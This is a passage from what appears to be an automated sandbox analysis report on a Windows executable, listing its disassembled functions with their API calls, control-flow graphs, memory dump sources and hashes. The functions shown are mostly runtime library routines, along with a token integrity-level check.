                                                                                                        Function 00DB72E0 Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00DB7328
                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00DB7335
                                                                                                        • GetLastError.KERNEL32 ref: 00DB733F
                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00EDB0F5), ref: 00DB7369
                                                                                                        • GetLastError.KERNEL32 ref: 00DB736F
                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00EDB0F5,00EDB0F5,00EDB0F5), ref: 00DB7395
                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DB73C8
                                                                                                        • EqualSid.ADVAPI32(00000000,?), ref: 00DB73D7
                                                                                                        • FreeSid.ADVAPI32(?), ref: 00DB73E6
                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00DB7420
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2037597787-0
                                                                                                        • Opcode ID: 5d1d59e94a1096d69ca3cb7f56401ea4a3ba320853f0e6fa4b6918e278d3e027
                                                                                                        • Instruction ID: 8e32833978b1bc9c6d1abbc8c19c5687b449f65b4c09bc4af42252039115e52d
                                                                                                        • Opcode Fuzzy Hash: 5d1d59e94a1096d69ca3cb7f56401ea4a3ba320853f0e6fa4b6918e278d3e027
                                                                                                        • Instruction Fuzzy Hash: 8141187194420DEFEF109FA5DD49BEEBBB8EF08314F244115E821B6290DB799908EB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA180E Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 159libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00E70260: EnterCriticalSection.KERNEL32(00F8FF6C,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF,?,00C91177,CA4F4AE5,?,00E9A90F), ref: 00E7026B
                                                                                                          • Part of subcall function 00E70260: LeaveCriticalSection.KERNEL32(00F8FF6C,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF,?,00C91177,CA4F4AE5,?,00E9A90F), ref: 00E702A8
                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00CA1897
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00CA189E
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CA1841
                                                                                                          • Part of subcall function 00E70216: EnterCriticalSection.KERNEL32(00F8FF6C,?,?,00C9AE07,00F90B9C,00EFA670), ref: 00E70220
                                                                                                          • Part of subcall function 00E70216: LeaveCriticalSection.KERNEL32(00F8FF6C,?,?,00C9AE07,00F90B9C,00EFA670), ref: 00E70253
                                                                                                          • Part of subcall function 00E70216: RtlWakeAllConditionVariable.NTDLL ref: 00E702CA
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CA18B2
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00CA18E1
                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00CA1909
                                                                                                        • CreateDirectoryW.KERNEL32(?), ref: 00CA1994
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$DirectoryEnterInit_thread_footerLeave$AddressConditionCreateExistsFileHandleModulePathProcVariableWakeWindows
                                                                                                        • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                                                        • API String ID: 1352637244-595641723
                                                                                                        • Opcode ID: c54a936063a0f004ec3861b37a0268590e72ec37844baa4097e4728a2b2d79cb
                                                                                                        • Instruction ID: 446176bc5cd584139074979f998955af2a4a019efa82068eb09ed7bd6ddf0a23
                                                                                                        • Opcode Fuzzy Hash: c54a936063a0f004ec3861b37a0268590e72ec37844baa4097e4728a2b2d79cb
                                                                                                        • Instruction Fuzzy Hash: 7F51E671D00209EBDF24EBA4DC8ABDD73B4AB44304F144299E80AB7191DB749F88DF61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E8A15D Relevance: 4.7, APIs: 3, Instructions: 202COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 79 e8a15d-e8a176 80 e8a178-e8a188 call e85418 79->80 81 e8a18c-e8a191 79->81 80->81 88 e8a18a 80->88 82 e8a1a0-e8a1c6 call e8f320 81->82 83 e8a193-e8a19d 81->83 89 e8a339-e8a34a call e6fd55 82->89 90 e8a1cc-e8a1d7 82->90 83->82 88->81 92 e8a32c 90->92 93 e8a1dd-e8a1e2 90->93 97 e8a32e 92->97 95 e8a1e4-e8a1ed call e70b80 93->95 96 e8a1f7-e8a202 call e881b8 93->96 104 e8a20d-e8a211 95->104 105 e8a1ef-e8a1f5 95->105 96->104 106 e8a204 96->106 100 e8a330-e8a337 call e6f459 97->100 100->89 104->97 108 e8a217-e8a22e call e8f320 104->108 109 e8a20a 105->109 106->109 108->97 112 e8a234-e8a246 call e89ec9 108->112 109->104 114 e8a24b-e8a24f 112->114 115 e8a26a-e8a26c 114->115 116 e8a251-e8a259 114->116 115->97 117 e8a25b-e8a260 116->117 118 e8a293-e8a29f 116->118 119 e8a312-e8a314 117->119 120 e8a266-e8a268 117->120 121 e8a31e 118->121 122 e8a2a1-e8a2a3 118->122 119->100 120->115 126 e8a271-e8a28b call e89ec9 120->126 125 e8a320-e8a327 call e6f459 121->125 123 e8a2b8-e8a2c3 call e881b8 122->123 124 e8a2a5-e8a2ae call e70b80 122->124 123->125 136 e8a2c5 123->136 124->125 135 e8a2b0-e8a2b6 124->135 125->115 126->119 137 e8a291 126->137 138 e8a2cb-e8a2d0 135->138 136->138 137->115 138->125 139 e8a2d2-e8a2ea call e89ec9 138->139 139->125 142 e8a2ec-e8a2f3 139->142 143 e8a2f5-e8a2f6 142->143 144 e8a316-e8a31c 142->144 145 e8a2f7-e8a309 call e8f39c 143->145 144->145 145->125 148 e8a30b-e8a311 call e6f459 145->148 148->119
                                                                                                        APIs
                                                                                                        • __freea.LIBCMT ref: 00E8A30C
                                                                                                          • Part of subcall function 00E881B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000009,?,00E7142C,0000000B,00000009,00000009,?,?,00CA079C,0000000D,0000000D), ref: 00E881EA
                                                                                                        • __freea.LIBCMT ref: 00E8A321
                                                                                                        • __freea.LIBCMT ref: 00E8A331
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243444508-0
                                                                                                        • Opcode ID: 2cc033c7a89b3f892e45648900f690bf4340120442c2aefa7990ecaac0b68507
                                                                                                        • Instruction ID: 652e7d633491827bcd527154bdb3e1b52fa0d45bc134eed67d135df77baf7564
                                                                                                        • Opcode Fuzzy Hash: 2cc033c7a89b3f892e45648900f690bf4340120442c2aefa7990ecaac0b68507
                                                                                                        • Instruction Fuzzy Hash: 5D518072601106AFFB21AEA49C41EBF3AE9EB44758B59113AFD0CF7151EB35DC1087A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E7B4D6 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00E7B4D0,00000016,O,?,?,CA4F4AE5,00E74FE2,?), ref: 00E7B4E7
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00E7B4D0,00000016,O,?,?,CA4F4AE5,00E74FE2,?), ref: 00E7B4EE
                                                                                                        • ExitProcess.KERNEL32 ref: 00E7B500
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: e223db098f07ee490f444676f6b857fcb3697cae7b03de9463beadcca03a770c
                                                                                                        • Instruction ID: fa8ee09691c13e07144d88001c97079e82aaa3c672326eff65753974a6ce1327
                                                                                                        • Opcode Fuzzy Hash: e223db098f07ee490f444676f6b857fcb3697cae7b03de9463beadcca03a770c
                                                                                                        • Instruction Fuzzy Hash: 4AD09E32000508AFDF416FA2DD0D9593F6AEF84755B249010F91D6A072EF31995ADA80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E85ECB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 158 e85ecb-e85ef9 call e7088f call e85c23 162 e85efe-e85f03 call e7086c 158->162
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID: O
                                                                                                        • API String ID: 431132790-3691759157
                                                                                                        • Opcode ID: 916a74c7ea8144f57db1596a367660b7375b66f43748342c9265c69c38a0d2c1
                                                                                                        • Instruction ID: a1546e2274ff9921257677922b142f61d3be131010c064c7f400b47027781eb2
                                                                                                        • Opcode Fuzzy Hash: 916a74c7ea8144f57db1596a367660b7375b66f43748342c9265c69c38a0d2c1
                                                                                                        • Instruction Fuzzy Hash: 43E09AB6C0020E9EEB15DFD4C452BEFB7F8AB08700F509426A209F6141EA7457458FE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E8FF0A Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 165 e8ff0a-e8ff32 call e8fa3a 168 e8ff38-e8ff3e 165->168 169 e900fa-e900fb call e8faab 165->169 171 e8ff41-e8ff47 168->171 172 e90100-e90102 169->172 173 e90049-e90068 call e720e0 171->173 174 e8ff4d-e8ff59 171->174 176 e90103-e90111 call e6fd55 172->176 182 e9006b-e90070 173->182 174->171 177 e8ff5b-e8ff61 174->177 180 e90041-e90044 177->180 181 e8ff67-e8ff73 IsValidCodePage 177->181 180->176 181->180 184 e8ff79-e8ff80 181->184 185 e900ad-e900b7 182->185 186 e90072-e90077 182->186 187 e8ffa8-e8ffb5 GetCPInfo 184->187 188 e8ff82-e8ff8e 184->188 185->182 193 e900b9-e900e3 call e8f9fc 185->193 191 e90079-e90081 186->191 192 e900aa 186->192 189 e90035-e9003b 187->189 190 e8ffb7-e8ffd6 call e720e0 187->190 194 e8ff92-e8ff9e call e8fb0e 188->194 189->169 189->180 190->194 205 e8ffd8-e8ffdf 190->205 198 e90083-e90086 191->198 199 e900a2-e900a8 191->199 192->185 204 e900e4-e900f3 193->204 201 e8ffa3 194->201 203 e90088-e9008e 198->203 199->186 199->192 201->172 203->199 206 e90090-e900a0 203->206 204->204 207 e900f5 204->207 208 e9000b-e9000e 205->208 209 e8ffe1-e8ffe6 205->209 206->199 206->203 207->169 211 e90013-e9001a 208->211 209->208 210 e8ffe8-e8fff0 209->210 212 e90003-e90009 210->212 213 e8fff2-e8fff9 210->213 211->211 214 e9001c-e90030 call e8f9fc 211->214 212->208 212->209 215 e8fffa-e90001 213->215 214->194 215->212 215->215
                                                                                                        APIs
                                                                                                          • Part of subcall function 00E8FA3A: GetOEMCP.KERNEL32(00000000,?,?,00000016,?), ref: 00E8FA65
                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00E8FD51,?,00000000,?,00000016,?), ref: 00E8FF6B
                                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E8FD51,?,00000000,?,00000016,?), ref: 00E8FFAD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CodeInfoPageValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 546120528-0
                                                                                                        • Opcode ID: 2a39c2bb72e9fdfd47046d231eac1360a0ef6eff55b5a5ec816406368e158187
                                                                                                        • Instruction ID: 586bc685d754a4538f8870c74d0524953bd8228537e8654d068c0506024cbca6
                                                                                                        • Opcode Fuzzy Hash: 2a39c2bb72e9fdfd47046d231eac1360a0ef6eff55b5a5ec816406368e158187
                                                                                                        • Instruction Fuzzy Hash: CA515570A002059EDF21DF75C8807EABBF5FF81308F18946ED18AE7252E7759A46CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E89EC9 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 218 e89ec9-e89ed8 call e8991f 221 e89eda-e89eff LCMapStringEx 218->221 222 e89f01-e89f1b call e89f26 LCMapStringW 218->222 226 e89f21-e89f23 221->226 222->226
                                                                                                        APIs
                                                                                                        • LCMapStringEx.KERNEL32(?,00E8A24B,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00E89EFD
                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00E8A24B,?,?,00000000,?,00000000), ref: 00E89F1B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2568140703-0
                                                                                                        • Opcode ID: b91e5594b031a2792534c08572ef2563d10238ab05a84180455a46b8e1aad046
                                                                                                        • Instruction ID: e7e322c010c7abc100f73c0dbf4c1fb86c28c1012919170480c945e2edabfe04
                                                                                                        • Opcode Fuzzy Hash: b91e5594b031a2792534c08572ef2563d10238ab05a84180455a46b8e1aad046
                                                                                                        • Instruction Fuzzy Hash: 6CF06832A0411ABBCF126FD1DC059EE3E66EB483A0B198111FA1865021C736C931AB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E8FB0E Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 227 e8fb0e-e8fb30 228 e8fc49-e8fc6f 227->228 229 e8fb36-e8fb48 GetCPInfo 227->229 230 e8fc74-e8fc79 228->230 229->228 231 e8fb4e-e8fb55 229->231 232 e8fc7b-e8fc81 230->232 233 e8fc83-e8fc89 230->233 234 e8fb57-e8fb61 231->234 236 e8fc91-e8fc93 232->236 237 e8fc8b-e8fc8e 233->237 238 e8fc95 233->238 234->234 235 e8fb63-e8fb76 234->235 239 e8fb97-e8fb99 235->239 240 e8fc97-e8fca9 236->240 237->236 238->240 241 e8fb78-e8fb7f 239->241 242 e8fb9b-e8fbd2 call e8cbb0 call e8a34b 239->242 240->230 243 e8fcab-e8fcb9 call e6fd55 240->243 244 e8fb8e-e8fb90 241->244 253 e8fbd7-e8fc0c call e8a34b 242->253 247 e8fb81-e8fb83 244->247 248 e8fb92-e8fb95 244->248 247->248 251 e8fb85-e8fb8d 247->251 248->239 251->244 256 e8fc0e-e8fc18 253->256 257 e8fc1a-e8fc24 256->257 258 e8fc26-e8fc28 256->258 259 e8fc38-e8fc45 257->259 260 e8fc2a-e8fc34 258->260 261 e8fc36 258->261 259->256 262 e8fc47 259->262 260->259 261->259 262->243
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(E8458D00,?,00E8FD5D,00E8FD51,00000000), ref: 00E8FB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 1807457897-0
                                                                                                        • Opcode ID: 8707e4466537c7d0886b40de56466ecc9f557bd9afebf5888e89a0129cf605d3
                                                                                                        • Instruction ID: 8750b0666affa3924987f1bd67f5c8fd122f94a295cad1499b14d1f365a2aa71
                                                                                                        • Opcode Fuzzy Hash: 8707e4466537c7d0886b40de56466ecc9f557bd9afebf5888e89a0129cf605d3
                                                                                                        • Instruction Fuzzy Hash: F9513A71A0415C9EDB219F28CD80AF6BBB8EB59304F2415FDD99EE7142D331AE46DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DA08F0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 263 da08f0-da0925 264 da096a-da0988 263->264 265 da0927-da093b call e70260 263->265 265->264 268 da093d-da0944 call da0a00 265->268 270 da0949-da0967 call e70118 call e70216 268->270 270->264
                                                                                                        APIs
                                                                                                          • Part of subcall function 00E70260: EnterCriticalSection.KERNEL32(00F8FF6C,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF,?,00C91177,CA4F4AE5,?,00E9A90F), ref: 00E7026B
                                                                                                          • Part of subcall function 00E70260: LeaveCriticalSection.KERNEL32(00F8FF6C,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF,?,00C91177,CA4F4AE5,?,00E9A90F), ref: 00E702A8
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00DA0962
                                                                                                          • Part of subcall function 00E70216: EnterCriticalSection.KERNEL32(00F8FF6C,?,?,00C9AE07,00F90B9C,00EFA670), ref: 00E70220
                                                                                                          • Part of subcall function 00E70216: LeaveCriticalSection.KERNEL32(00F8FF6C,?,?,00C9AE07,00F90B9C,00EFA670), ref: 00E70253
                                                                                                          • Part of subcall function 00E70216: RtlWakeAllConditionVariable.NTDLL ref: 00E702CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                        • String ID:
                                                                                                        • API String ID: 2296764815-0
                                                                                                        • Opcode ID: a4ca6187158468c881e8a8d695619fb0c49a1b52f29441619cc3221c690f51d1
                                                                                                        • Instruction ID: 8353b6b7215fc96d0d011dd40f8762221f34fbbf60de32d6ca40a060d6840e6c
                                                                                                        • Opcode Fuzzy Hash: a4ca6187158468c881e8a8d695619fb0c49a1b52f29441619cc3221c690f51d1
                                                                                                        • Instruction Fuzzy Hash: C301F7B1E04648DBDB12EB58EC46B4977E4EB08B20F10433AF42AD37D1D731E900AA12
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E89720 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 275 e89720-e8972b 276 e89739-e8973f 275->276 277 e8972d-e89737 275->277 279 e89758-e89769 RtlAllocateHeap 276->279 280 e89741-e89742 276->280 277->276 278 e8976d-e89778 call e752ff 277->278 286 e8977a-e8977c 278->286 282 e8976b 279->282 283 e89744-e8974b call e8792b 279->283 280->279 282->286 283->278 288 e8974d-e89756 call e85443 283->288 288->278 288->279
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000000D,00000001,?,00E87F74,00000001,00000364,00000001,00000002,000000FF,?,00E7142C,0000000B,00000009,00000009), ref: 00E89761
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
